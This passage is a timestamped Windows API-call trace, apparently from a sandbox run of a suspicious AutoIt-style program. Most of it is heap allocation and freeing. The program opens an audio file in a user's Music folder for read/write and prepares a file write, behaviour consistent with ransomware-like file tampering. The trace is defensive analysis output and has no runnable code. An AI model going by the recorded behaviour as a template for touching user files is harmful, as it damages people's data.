[0184.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.809] FreeLibrary (hLibModule=0x75c90000) returned 1 [0184.809] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0184.822] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0184.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0184.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0184.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.822] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0184.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0184.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba1b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0184.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\snzbfu-3qx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0184.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0184.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0184.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbdab50 | out: hHeap=0x8a0000) returned 1 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.825] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0184.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0184.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.829] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.829] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0184.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0184.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0184.830] RtlAllocateHeap 